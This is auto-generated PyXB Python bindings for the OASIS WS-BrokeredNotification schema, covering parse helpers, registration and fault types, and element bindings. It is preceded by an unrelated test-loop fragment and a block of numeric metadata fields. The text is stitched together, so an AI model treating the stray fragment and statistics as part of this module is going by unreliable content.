    for r in range(rows):
        for c in range(cols):
            for p in range(2):
                for q in range(3):
                    assert val[r, c][p, q] == mat.get_entry(p, q)
| 17.4
| 55
| 0.514176
| 260
| 1,305
| 2.534615
| 0.153846
| 0.212443
| 0.054628
| 0.100152
| 0.85129
| 0.85129
| 0.819423
| 0.819423
| 0.734446
| 0.734446
| 0
| 0.041341
| 0.314176
| 1,305
| 74
| 56
| 17.635135
| 0.694972
| 0
| 0
| 0.8
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.054545
| 1
| 0.109091
| false
| 0
| 0.018182
| 0
| 0.127273
| 0
| 0
| 0
| 0
| null | 1
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
0a15fe42844a2fc3c076f20a549cbca350e90d38
| 68,765
|
py
|
Python
|
dev/Tools/Python/2.7.13/mac/Python.framework/Versions/2.7/lib/python2.7/site-packages/pyxb/bundles/wssplat/raw/wsrf_br.py
|
jeikabu/lumberyard
|
07228c605ce16cbf5aaa209a94a3cb9d6c1a4115
|
[
"AML"
] | 8
|
2019-10-07T16:33:47.000Z
|
2020-12-07T03:59:58.000Z
|
dev/Tools/Python/2.7.13/mac/Python.framework/Versions/2.7/lib/python2.7/site-packages/pyxb/bundles/wssplat/raw/wsrf_br.py
|
jeikabu/lumberyard
|
07228c605ce16cbf5aaa209a94a3cb9d6c1a4115
|
[
"AML"
] | null | null | null |
dev/Tools/Python/2.7.13/mac/Python.framework/Versions/2.7/lib/python2.7/site-packages/pyxb/bundles/wssplat/raw/wsrf_br.py
|
jeikabu/lumberyard
|
07228c605ce16cbf5aaa209a94a3cb9d6c1a4115
|
[
"AML"
] | 5
|
2020-08-27T20:44:18.000Z
|
2021-08-21T22:54:11.000Z
|
# ./pyxb/bundles/wssplat/raw/wsrf_br.py
# -*- coding: utf-8 -*-
# PyXB bindings for NM:dd5653a4ef6cf46e4740ac1eaece204a915200aa
# Generated 2014-10-19 06:25:00.905939 by PyXB version 1.2.4 using Python 2.7.3.final.0
# Namespace http://docs.oasis-open.org/wsn/br-2
# NOTE: This module is auto-generated by PyXB from the WS-BrokeredNotification
# (wsrf_br) schema; do not edit by hand.
from __future__ import unicode_literals
import pyxb
import pyxb.binding
import pyxb.binding.saxer
import io
import pyxb.utils.utility
import pyxb.utils.domutils
import sys
import pyxb.utils.six as _six
# Unique identifier for bindings created at the same time
_GenerationUID = pyxb.utils.utility.UniqueIdentifier('urn:uuid:906eb6e4-5782-11e4-b088-c8600024e903')
# Version of PyXB used to generate the bindings
_PyXBVersion = '1.2.4'
# Generated bindings are not compatible across PyXB versions
if pyxb.__version__ != _PyXBVersion:
    raise pyxb.PyXBVersionError(_PyXBVersion)
# Import bindings for namespaces imported into schema
import pyxb.bundles.wssplat.wsa
import pyxb.bundles.wssplat.wstop
import pyxb.binding.datatypes
import pyxb.bundles.wssplat.wsrf_bf
import pyxb.bundles.wssplat.wsnt
# NOTE: All namespace declarations are reserved within the binding
Namespace = pyxb.namespace.NamespaceForURI('http://docs.oasis-open.org/wsn/br-2', create_if_missing=True)
Namespace.configureCategories(['typeBinding', 'elementBinding'])
# Aliases for the imported namespaces this schema references, each registered
# for type/element binding lookup.
_Namespace_wsn_b = pyxb.bundles.wssplat.wsnt.Namespace
_Namespace_wsn_b.configureCategories(['typeBinding', 'elementBinding'])
_Namespace_wstop = pyxb.bundles.wssplat.wstop.Namespace
_Namespace_wstop.configureCategories(['typeBinding', 'elementBinding'])
_Namespace_wsrf_bf = pyxb.bundles.wssplat.wsrf_bf.Namespace
_Namespace_wsrf_bf.configureCategories(['typeBinding', 'elementBinding'])
def CreateFromDocument (xml_text, default_namespace=None, location_base=None):
    """Parse the given XML and use the document element to create a
    Python instance.

    @param xml_text An XML document. This should be data (Python 2
    str or Python 3 bytes), or a text (Python 2 unicode or Python 3
    str) in the L{pyxb._InputEncoding} encoding.

    @keyword default_namespace The L{pyxb.Namespace} instance to use as the
    default namespace where there is no default namespace in scope.
    If unspecified or C{None}, the namespace of the module containing
    this function will be used.

    @keyword location_base: An object to be recorded as the base of all
    L{pyxb.utils.utility.Location} instances associated with events and
    objects handled by the parser. You might pass the URI from which
    the document was obtained.
    """
    # When SAX is not the configured XML style, fall back to the DOM path.
    if pyxb.XMLStyle_saxer != pyxb._XMLStyle:
        dom = pyxb.utils.domutils.StringToDOM(xml_text)
        return CreateFromDOM(dom.documentElement, default_namespace=default_namespace)
    if default_namespace is None:
        default_namespace = Namespace.fallbackNamespace()
    parser = pyxb.binding.saxer.make_parser(fallback_namespace=default_namespace, location_base=location_base)
    # The SAX parser consumes bytes; encode text input first.
    raw = xml_text
    if isinstance(raw, _six.text_type):
        raw = raw.encode(pyxb._InputEncoding)
    parser.parse(io.BytesIO(raw))
    return parser.getContentHandler().rootObject()
def CreateFromDOM (node, default_namespace=None):
    """Create a Python instance from the given DOM node.
    The node tag must correspond to an element declaration in this module.

    @deprecated: Forcing use of DOM interface is unnecessary; use L{CreateFromDocument}."""
    # Resolve the namespace lazily so the module-level fallback is honoured.
    ns = default_namespace if default_namespace is not None else Namespace.fallbackNamespace()
    return pyxb.binding.basis.element.AnyCreateFromDOM(node, ns)
# Complex type [anonymous] with content type ELEMENT_ONLY
# Auto-generated PyXB binding class; the metadata attributes and
# ElementDeclaration entries below mirror the XSD schema and must not be
# edited by hand.
class CTD_ANON (pyxb.binding.basis.complexTypeDefinition):
    """Complex type [anonymous] with content type ELEMENT_ONLY"""
    _TypeDefinition = None
    _ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
    _Abstract = False
    _ExpandedName = None
    _XSDLocation = pyxb.utils.utility.Location('/tmp/pyxbdist.mqXn05k/PyXB-1.2.4/pyxb/bundles/wssplat/schemas/wsrf_br.xsd', 57, 12)
    _ElementMap = {}
    _AttributeMap = {}
    # Base type is pyxb.binding.datatypes.anyType

    # Element {http://docs.oasis-open.org/wsn/b-2}TopicExpression uses Python identifier TopicExpression
    __TopicExpression = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(_Namespace_wsn_b, 'TopicExpression'), 'TopicExpression', '__httpdocs_oasis_open_orgwsnbr_2_CTD_ANON_httpdocs_oasis_open_orgwsnb_2TopicExpression', True, pyxb.utils.utility.Location('/tmp/pyxbdist.mqXn05k/PyXB-1.2.4/pyxb/bundles/wssplat/schemas/wsnt.xsd', 71, 2), )

    TopicExpression = property(__TopicExpression.value, __TopicExpression.set, None, None)

    # Element {http://docs.oasis-open.org/wsn/b-2}FixedTopicSet uses Python identifier FixedTopicSet
    __FixedTopicSet = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(_Namespace_wsn_b, 'FixedTopicSet'), 'FixedTopicSet', '__httpdocs_oasis_open_orgwsnbr_2_CTD_ANON_httpdocs_oasis_open_orgwsnb_2FixedTopicSet', False, pyxb.utils.utility.Location('/tmp/pyxbdist.mqXn05k/PyXB-1.2.4/pyxb/bundles/wssplat/schemas/wsnt.xsd', 72, 2), )

    FixedTopicSet = property(__FixedTopicSet.value, __FixedTopicSet.set, None, None)

    # Element {http://docs.oasis-open.org/wsn/b-2}TopicExpressionDialect uses Python identifier TopicExpressionDialect
    __TopicExpressionDialect = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(_Namespace_wsn_b, 'TopicExpressionDialect'), 'TopicExpressionDialect', '__httpdocs_oasis_open_orgwsnbr_2_CTD_ANON_httpdocs_oasis_open_orgwsnb_2TopicExpressionDialect', True, pyxb.utils.utility.Location('/tmp/pyxbdist.mqXn05k/PyXB-1.2.4/pyxb/bundles/wssplat/schemas/wsnt.xsd', 73, 2), )

    TopicExpressionDialect = property(__TopicExpressionDialect.value, __TopicExpressionDialect.set, None, None)

    # Element {http://docs.oasis-open.org/wsn/br-2}RequiresRegistration uses Python identifier RequiresRegistration
    __RequiresRegistration = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'RequiresRegistration'), 'RequiresRegistration', '__httpdocs_oasis_open_orgwsnbr_2_CTD_ANON_httpdocs_oasis_open_orgwsnbr_2RequiresRegistration', False, pyxb.utils.utility.Location('/tmp/pyxbdist.mqXn05k/PyXB-1.2.4/pyxb/bundles/wssplat/schemas/wsrf_br.xsd', 43, 3), )

    RequiresRegistration = property(__RequiresRegistration.value, __RequiresRegistration.set, None, None)

    # Element {http://docs.oasis-open.org/wsn/t-1}TopicSet uses Python identifier TopicSet
    __TopicSet = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(_Namespace_wstop, 'TopicSet'), 'TopicSet', '__httpdocs_oasis_open_orgwsnbr_2_CTD_ANON_httpdocs_oasis_open_orgwsnt_1TopicSet', False, pyxb.utils.utility.Location('/tmp/pyxbdist.mqXn05k/PyXB-1.2.4/pyxb/bundles/wssplat/schemas/wstop.xsd', 133, 2), )

    TopicSet = property(__TopicSet.value, __TopicSet.set, None, None)

    # Register the element declarations; this anonymous type has no attributes.
    _ElementMap.update({
        __TopicExpression.name() : __TopicExpression,
        __FixedTopicSet.name() : __FixedTopicSet,
        __TopicExpressionDialect.name() : __TopicExpressionDialect,
        __RequiresRegistration.name() : __RequiresRegistration,
        __TopicSet.name() : __TopicSet
    })
    _AttributeMap.update({

    })
# Complex type [anonymous] with content type ELEMENT_ONLY
# Auto-generated PyXB binding class; do not edit by hand.
class CTD_ANON_ (pyxb.binding.basis.complexTypeDefinition):
    """Complex type [anonymous] with content type ELEMENT_ONLY"""
    _TypeDefinition = None
    _ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
    _Abstract = False
    _ExpandedName = None
    _XSDLocation = pyxb.utils.utility.Location('/tmp/pyxbdist.mqXn05k/PyXB-1.2.4/pyxb/bundles/wssplat/schemas/wsrf_br.xsd', 77, 12)
    _ElementMap = {}
    _AttributeMap = {}
    # Base type is pyxb.binding.datatypes.anyType

    # Element {http://docs.oasis-open.org/wsn/br-2}PublisherReference uses Python identifier PublisherReference
    __PublisherReference = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'PublisherReference'), 'PublisherReference', '__httpdocs_oasis_open_orgwsnbr_2_CTD_ANON__httpdocs_oasis_open_orgwsnbr_2PublisherReference', False, pyxb.utils.utility.Location('/tmp/pyxbdist.mqXn05k/PyXB-1.2.4/pyxb/bundles/wssplat/schemas/wsrf_br.xsd', 46, 3), )

    PublisherReference = property(__PublisherReference.value, __PublisherReference.set, None, None)

    # Element {http://docs.oasis-open.org/wsn/br-2}Topic uses Python identifier Topic
    __Topic = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'Topic'), 'Topic', '__httpdocs_oasis_open_orgwsnbr_2_CTD_ANON__httpdocs_oasis_open_orgwsnbr_2Topic', True, pyxb.utils.utility.Location('/tmp/pyxbdist.mqXn05k/PyXB-1.2.4/pyxb/bundles/wssplat/schemas/wsrf_br.xsd', 50, 3), )

    Topic = property(__Topic.value, __Topic.set, None, None)

    # Element {http://docs.oasis-open.org/wsn/br-2}Demand uses Python identifier Demand
    __Demand = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'Demand'), 'Demand', '__httpdocs_oasis_open_orgwsnbr_2_CTD_ANON__httpdocs_oasis_open_orgwsnbr_2Demand', False, pyxb.utils.utility.Location('/tmp/pyxbdist.mqXn05k/PyXB-1.2.4/pyxb/bundles/wssplat/schemas/wsrf_br.xsd', 52, 3), )

    Demand = property(__Demand.value, __Demand.set, None, None)

    # Element {http://docs.oasis-open.org/wsn/br-2}CreationTime uses Python identifier CreationTime
    __CreationTime = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'CreationTime'), 'CreationTime', '__httpdocs_oasis_open_orgwsnbr_2_CTD_ANON__httpdocs_oasis_open_orgwsnbr_2CreationTime', False, pyxb.utils.utility.Location('/tmp/pyxbdist.mqXn05k/PyXB-1.2.4/pyxb/bundles/wssplat/schemas/wsrf_br.xsd', 54, 3), )

    CreationTime = property(__CreationTime.value, __CreationTime.set, None, None)

    # Register the element declarations; this anonymous type has no attributes.
    _ElementMap.update({
        __PublisherReference.name() : __PublisherReference,
        __Topic.name() : __Topic,
        __Demand.name() : __Demand,
        __CreationTime.name() : __CreationTime
    })
    _AttributeMap.update({

    })
# Complex type [anonymous] with content type ELEMENT_ONLY
# Auto-generated PyXB binding class; do not edit by hand.
class CTD_ANON_2 (pyxb.binding.basis.complexTypeDefinition):
    """Complex type [anonymous] with content type ELEMENT_ONLY"""
    _TypeDefinition = None
    _ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
    _Abstract = False
    _ExpandedName = None
    _XSDLocation = pyxb.utils.utility.Location('/tmp/pyxbdist.mqXn05k/PyXB-1.2.4/pyxb/bundles/wssplat/schemas/wsrf_br.xsd', 93, 12)
    _ElementMap = {}
    _AttributeMap = {}
    # Base type is pyxb.binding.datatypes.anyType

    # Element {http://docs.oasis-open.org/wsn/br-2}PublisherReference uses Python identifier PublisherReference
    __PublisherReference = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'PublisherReference'), 'PublisherReference', '__httpdocs_oasis_open_orgwsnbr_2_CTD_ANON_2_httpdocs_oasis_open_orgwsnbr_2PublisherReference', False, pyxb.utils.utility.Location('/tmp/pyxbdist.mqXn05k/PyXB-1.2.4/pyxb/bundles/wssplat/schemas/wsrf_br.xsd', 95, 18), )

    PublisherReference = property(__PublisherReference.value, __PublisherReference.set, None, None)

    # Element {http://docs.oasis-open.org/wsn/br-2}Topic uses Python identifier Topic
    __Topic = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'Topic'), 'Topic', '__httpdocs_oasis_open_orgwsnbr_2_CTD_ANON_2_httpdocs_oasis_open_orgwsnbr_2Topic', True, pyxb.utils.utility.Location('/tmp/pyxbdist.mqXn05k/PyXB-1.2.4/pyxb/bundles/wssplat/schemas/wsrf_br.xsd', 98, 18), )

    Topic = property(__Topic.value, __Topic.set, None, None)

    # Element {http://docs.oasis-open.org/wsn/br-2}Demand uses Python identifier Demand
    __Demand = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'Demand'), 'Demand', '__httpdocs_oasis_open_orgwsnbr_2_CTD_ANON_2_httpdocs_oasis_open_orgwsnbr_2Demand', False, pyxb.utils.utility.Location('/tmp/pyxbdist.mqXn05k/PyXB-1.2.4/pyxb/bundles/wssplat/schemas/wsrf_br.xsd', 101, 18), )

    Demand = property(__Demand.value, __Demand.set, None, None)

    # Element {http://docs.oasis-open.org/wsn/br-2}InitialTerminationTime uses Python identifier InitialTerminationTime
    __InitialTerminationTime = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'InitialTerminationTime'), 'InitialTerminationTime', '__httpdocs_oasis_open_orgwsnbr_2_CTD_ANON_2_httpdocs_oasis_open_orgwsnbr_2InitialTerminationTime', False, pyxb.utils.utility.Location('/tmp/pyxbdist.mqXn05k/PyXB-1.2.4/pyxb/bundles/wssplat/schemas/wsrf_br.xsd', 104, 18), )

    InitialTerminationTime = property(__InitialTerminationTime.value, __InitialTerminationTime.set, None, None)

    # Schema permits additional (wildcard) element content for this type.
    _HasWildcardElement = True
    # Register the element declarations; this anonymous type has no attributes.
    _ElementMap.update({
        __PublisherReference.name() : __PublisherReference,
        __Topic.name() : __Topic,
        __Demand.name() : __Demand,
        __InitialTerminationTime.name() : __InitialTerminationTime
    })
    _AttributeMap.update({

    })
# Complex type [anonymous] with content type ELEMENT_ONLY
# Auto-generated PyXB binding class; do not edit by hand.
class CTD_ANON_3 (pyxb.binding.basis.complexTypeDefinition):
    """Complex type [anonymous] with content type ELEMENT_ONLY"""
    _TypeDefinition = None
    _ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
    _Abstract = False
    _ExpandedName = None
    _XSDLocation = pyxb.utils.utility.Location('/tmp/pyxbdist.mqXn05k/PyXB-1.2.4/pyxb/bundles/wssplat/schemas/wsrf_br.xsd', 114, 12)
    _ElementMap = {}
    _AttributeMap = {}
    # Base type is pyxb.binding.datatypes.anyType

    # Element {http://docs.oasis-open.org/wsn/br-2}PublisherRegistrationReference uses Python identifier PublisherRegistrationReference
    __PublisherRegistrationReference = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'PublisherRegistrationReference'), 'PublisherRegistrationReference', '__httpdocs_oasis_open_orgwsnbr_2_CTD_ANON_3_httpdocs_oasis_open_orgwsnbr_2PublisherRegistrationReference', False, pyxb.utils.utility.Location('/tmp/pyxbdist.mqXn05k/PyXB-1.2.4/pyxb/bundles/wssplat/schemas/wsrf_br.xsd', 116, 18), )

    PublisherRegistrationReference = property(__PublisherRegistrationReference.value, __PublisherRegistrationReference.set, None, None)

    # Element {http://docs.oasis-open.org/wsn/br-2}ConsumerReference uses Python identifier ConsumerReference
    __ConsumerReference = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'ConsumerReference'), 'ConsumerReference', '__httpdocs_oasis_open_orgwsnbr_2_CTD_ANON_3_httpdocs_oasis_open_orgwsnbr_2ConsumerReference', False, pyxb.utils.utility.Location('/tmp/pyxbdist.mqXn05k/PyXB-1.2.4/pyxb/bundles/wssplat/schemas/wsrf_br.xsd', 119, 5), )

    ConsumerReference = property(__ConsumerReference.value, __ConsumerReference.set, None, None)

    # Register the element declarations; this anonymous type has no attributes.
    _ElementMap.update({
        __PublisherRegistrationReference.name() : __PublisherRegistrationReference,
        __ConsumerReference.name() : __ConsumerReference
    })
    _AttributeMap.update({

    })
# Complex type {http://docs.oasis-open.org/wsn/br-2}PublisherRegistrationRejectedFaultType with content type ELEMENT_ONLY
# Auto-generated PyXB binding class extending the WS-BaseFaults base fault
# type; do not edit by hand.
class PublisherRegistrationRejectedFaultType (pyxb.bundles.wssplat.wsrf_bf.BaseFaultType):
    """Complex type {http://docs.oasis-open.org/wsn/br-2}PublisherRegistrationRejectedFaultType with content type ELEMENT_ONLY"""
    _TypeDefinition = None
    _ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
    _Abstract = False
    _ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'PublisherRegistrationRejectedFaultType')
    _XSDLocation = pyxb.utils.utility.Location('/tmp/pyxbdist.mqXn05k/PyXB-1.2.4/pyxb/bundles/wssplat/schemas/wsrf_br.xsd', 127, 3)
    # Copies (not references) of the base maps so updates stay local to this type.
    _ElementMap = pyxb.bundles.wssplat.wsrf_bf.BaseFaultType._ElementMap.copy()
    _AttributeMap = pyxb.bundles.wssplat.wsrf_bf.BaseFaultType._AttributeMap.copy()
    # Base type is pyxb.bundles.wssplat.wsrf_bf.BaseFaultType

    # Element Timestamp ({http://docs.oasis-open.org/wsrf/bf-2}Timestamp) inherited from {http://docs.oasis-open.org/wsrf/bf-2}BaseFaultType

    # Element Originator ({http://docs.oasis-open.org/wsrf/bf-2}Originator) inherited from {http://docs.oasis-open.org/wsrf/bf-2}BaseFaultType

    # Element ErrorCode ({http://docs.oasis-open.org/wsrf/bf-2}ErrorCode) inherited from {http://docs.oasis-open.org/wsrf/bf-2}BaseFaultType

    # Element Description ({http://docs.oasis-open.org/wsrf/bf-2}Description) inherited from {http://docs.oasis-open.org/wsrf/bf-2}BaseFaultType

    # Element FaultCause ({http://docs.oasis-open.org/wsrf/bf-2}FaultCause) inherited from {http://docs.oasis-open.org/wsrf/bf-2}BaseFaultType

    # Attributes outside the bf-2 namespace are accepted with lax processing.
    _AttributeWildcard = pyxb.binding.content.Wildcard(process_contents=pyxb.binding.content.Wildcard.PC_lax, namespace_constraint=(pyxb.binding.content.Wildcard.NC_not, 'http://docs.oasis-open.org/wsrf/bf-2'))
    _HasWildcardElement = True
    _ElementMap.update({

    })
    _AttributeMap.update({

    })
Namespace.addCategoryObject('typeBinding', 'PublisherRegistrationRejectedFaultType', PublisherRegistrationRejectedFaultType)
# Complex type {http://docs.oasis-open.org/wsn/br-2}PublisherRegistrationFailedFaultType with content type ELEMENT_ONLY
class PublisherRegistrationFailedFaultType (pyxb.bundles.wssplat.wsrf_bf.BaseFaultType):
    """Complex type {http://docs.oasis-open.org/wsn/br-2}PublisherRegistrationFailedFaultType with content type ELEMENT_ONLY

    Fault type derived from the WS-BaseFaults ``BaseFaultType``; all of
    its elements (Timestamp, Originator, ErrorCode, Description,
    FaultCause) are inherited from that base.
    """
    _TypeDefinition = None
    _ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
    _Abstract = False
    _ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'PublisherRegistrationFailedFaultType')
    _XSDLocation = pyxb.utils.utility.Location('/tmp/pyxbdist.mqXn05k/PyXB-1.2.4/pyxb/bundles/wssplat/schemas/wsrf_br.xsd', 135, 3)
    # Start from copies of the base type's maps so inherited members are kept.
    _ElementMap = pyxb.bundles.wssplat.wsrf_bf.BaseFaultType._ElementMap.copy()
    _AttributeMap = pyxb.bundles.wssplat.wsrf_bf.BaseFaultType._AttributeMap.copy()
    # Base type is pyxb.bundles.wssplat.wsrf_bf.BaseFaultType

    # Element Timestamp ({http://docs.oasis-open.org/wsrf/bf-2}Timestamp) inherited from {http://docs.oasis-open.org/wsrf/bf-2}BaseFaultType
    # Element Originator ({http://docs.oasis-open.org/wsrf/bf-2}Originator) inherited from {http://docs.oasis-open.org/wsrf/bf-2}BaseFaultType
    # Element ErrorCode ({http://docs.oasis-open.org/wsrf/bf-2}ErrorCode) inherited from {http://docs.oasis-open.org/wsrf/bf-2}BaseFaultType
    # Element Description ({http://docs.oasis-open.org/wsrf/bf-2}Description) inherited from {http://docs.oasis-open.org/wsrf/bf-2}BaseFaultType
    # Element FaultCause ({http://docs.oasis-open.org/wsrf/bf-2}FaultCause) inherited from {http://docs.oasis-open.org/wsrf/bf-2}BaseFaultType

    # Lax-processed attribute wildcard excluding the wsrf/bf-2 namespace.
    _AttributeWildcard = pyxb.binding.content.Wildcard(process_contents=pyxb.binding.content.Wildcard.PC_lax, namespace_constraint=(pyxb.binding.content.Wildcard.NC_not, 'http://docs.oasis-open.org/wsrf/bf-2'))
    _HasWildcardElement = True
    # No locally-declared elements or attributes beyond the inherited ones.
    _ElementMap.update({
    })
    _AttributeMap.update({
    })
# Register the named type binding in the namespace category map.
Namespace.addCategoryObject('typeBinding', 'PublisherRegistrationFailedFaultType', PublisherRegistrationFailedFaultType)
# Complex type [anonymous] with content type ELEMENT_ONLY
class CTD_ANON_4 (pyxb.binding.basis.complexTypeDefinition):
    """Complex type [anonymous] with content type ELEMENT_ONLY

    Anonymous binding type; later in this module it is bound to the
    ``DestroyRegistration`` element.  It declares no named children,
    only a strict element/attribute wildcard.
    """
    _TypeDefinition = None
    _ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
    _Abstract = False
    # Anonymous type: it has no expanded name of its own.
    _ExpandedName = None
    _XSDLocation = pyxb.utils.utility.Location('/tmp/pyxbdist.mqXn05k/PyXB-1.2.4/pyxb/bundles/wssplat/schemas/wsrf_br.xsd', 146, 4)
    _ElementMap = {}
    _AttributeMap = {}
    # Base type is pyxb.binding.datatypes.anyType

    # Strictly-processed attribute wildcard over any namespace.
    _AttributeWildcard = pyxb.binding.content.Wildcard(process_contents=pyxb.binding.content.Wildcard.PC_strict, namespace_constraint=pyxb.binding.content.Wildcard.NC_any)
    _HasWildcardElement = True
    # No named elements or attributes are declared for this type.
    _ElementMap.update({
    })
    _AttributeMap.update({
    })
# Complex type [anonymous] with content type ELEMENT_ONLY
class CTD_ANON_5 (pyxb.binding.basis.complexTypeDefinition):
    """Complex type [anonymous] with content type ELEMENT_ONLY

    Anonymous binding type; later in this module it is bound to the
    ``DestroyRegistrationResponse`` element.  It declares no named
    children, only a strict element/attribute wildcard.
    """
    _TypeDefinition = None
    _ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
    _Abstract = False
    # Anonymous type: it has no expanded name of its own.
    _ExpandedName = None
    _XSDLocation = pyxb.utils.utility.Location('/tmp/pyxbdist.mqXn05k/PyXB-1.2.4/pyxb/bundles/wssplat/schemas/wsrf_br.xsd', 156, 4)
    _ElementMap = {}
    _AttributeMap = {}
    # Base type is pyxb.binding.datatypes.anyType

    # Strictly-processed attribute wildcard over any namespace.
    _AttributeWildcard = pyxb.binding.content.Wildcard(process_contents=pyxb.binding.content.Wildcard.PC_strict, namespace_constraint=pyxb.binding.content.Wildcard.NC_any)
    _HasWildcardElement = True
    # No named elements or attributes are declared for this type.
    _ElementMap.update({
    })
    _AttributeMap.update({
    })
# Complex type {http://docs.oasis-open.org/wsn/br-2}ResourceNotDestroyedFaultType with content type ELEMENT_ONLY
class ResourceNotDestroyedFaultType (pyxb.bundles.wssplat.wsrf_bf.BaseFaultType):
    """Complex type {http://docs.oasis-open.org/wsn/br-2}ResourceNotDestroyedFaultType with content type ELEMENT_ONLY

    Fault type derived from the WS-BaseFaults ``BaseFaultType``; all of
    its elements (Timestamp, Originator, ErrorCode, Description,
    FaultCause) are inherited from that base.
    """
    _TypeDefinition = None
    _ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
    _Abstract = False
    _ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'ResourceNotDestroyedFaultType')
    _XSDLocation = pyxb.utils.utility.Location('/tmp/pyxbdist.mqXn05k/PyXB-1.2.4/pyxb/bundles/wssplat/schemas/wsrf_br.xsd', 165, 2)
    # Start from copies of the base type's maps so inherited members are kept.
    _ElementMap = pyxb.bundles.wssplat.wsrf_bf.BaseFaultType._ElementMap.copy()
    _AttributeMap = pyxb.bundles.wssplat.wsrf_bf.BaseFaultType._AttributeMap.copy()
    # Base type is pyxb.bundles.wssplat.wsrf_bf.BaseFaultType

    # Element Timestamp ({http://docs.oasis-open.org/wsrf/bf-2}Timestamp) inherited from {http://docs.oasis-open.org/wsrf/bf-2}BaseFaultType
    # Element Originator ({http://docs.oasis-open.org/wsrf/bf-2}Originator) inherited from {http://docs.oasis-open.org/wsrf/bf-2}BaseFaultType
    # Element ErrorCode ({http://docs.oasis-open.org/wsrf/bf-2}ErrorCode) inherited from {http://docs.oasis-open.org/wsrf/bf-2}BaseFaultType
    # Element Description ({http://docs.oasis-open.org/wsrf/bf-2}Description) inherited from {http://docs.oasis-open.org/wsrf/bf-2}BaseFaultType
    # Element FaultCause ({http://docs.oasis-open.org/wsrf/bf-2}FaultCause) inherited from {http://docs.oasis-open.org/wsrf/bf-2}BaseFaultType

    # Lax-processed attribute wildcard excluding the wsrf/bf-2 namespace.
    _AttributeWildcard = pyxb.binding.content.Wildcard(process_contents=pyxb.binding.content.Wildcard.PC_lax, namespace_constraint=(pyxb.binding.content.Wildcard.NC_not, 'http://docs.oasis-open.org/wsrf/bf-2'))
    _HasWildcardElement = True
    # No locally-declared elements or attributes beyond the inherited ones.
    _ElementMap.update({
    })
    _AttributeMap.update({
    })
# Register the named type binding in the namespace category map.
Namespace.addCategoryObject('typeBinding', 'ResourceNotDestroyedFaultType', ResourceNotDestroyedFaultType)
# ---------------------------------------------------------------------------
# Top-level element bindings for the {http://docs.oasis-open.org/wsn/br-2}
# namespace.  Each element is created with its bound type and schema
# location, then registered in the namespace's elementBinding category.
# ---------------------------------------------------------------------------
RequiresRegistration = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'RequiresRegistration'), pyxb.binding.datatypes.boolean, location=pyxb.utils.utility.Location('/tmp/pyxbdist.mqXn05k/PyXB-1.2.4/pyxb/bundles/wssplat/schemas/wsrf_br.xsd', 43, 3))
Namespace.addCategoryObject('elementBinding', RequiresRegistration.name().localName(), RequiresRegistration)
PublisherReference = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'PublisherReference'), pyxb.bundles.wssplat.wsa.EndpointReferenceType, location=pyxb.utils.utility.Location('/tmp/pyxbdist.mqXn05k/PyXB-1.2.4/pyxb/bundles/wssplat/schemas/wsrf_br.xsd', 46, 3))
Namespace.addCategoryObject('elementBinding', PublisherReference.name().localName(), PublisherReference)
ConsumerReference = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'ConsumerReference'), pyxb.bundles.wssplat.wsa.EndpointReferenceType, location=pyxb.utils.utility.Location('/tmp/pyxbdist.mqXn05k/PyXB-1.2.4/pyxb/bundles/wssplat/schemas/wsrf_br.xsd', 48, 3))
Namespace.addCategoryObject('elementBinding', ConsumerReference.name().localName(), ConsumerReference)
Topic = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'Topic'), pyxb.bundles.wssplat.wsnt.TopicExpressionType, location=pyxb.utils.utility.Location('/tmp/pyxbdist.mqXn05k/PyXB-1.2.4/pyxb/bundles/wssplat/schemas/wsrf_br.xsd', 50, 3))
Namespace.addCategoryObject('elementBinding', Topic.name().localName(), Topic)
Demand = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'Demand'), pyxb.binding.datatypes.boolean, location=pyxb.utils.utility.Location('/tmp/pyxbdist.mqXn05k/PyXB-1.2.4/pyxb/bundles/wssplat/schemas/wsrf_br.xsd', 52, 3))
Namespace.addCategoryObject('elementBinding', Demand.name().localName(), Demand)
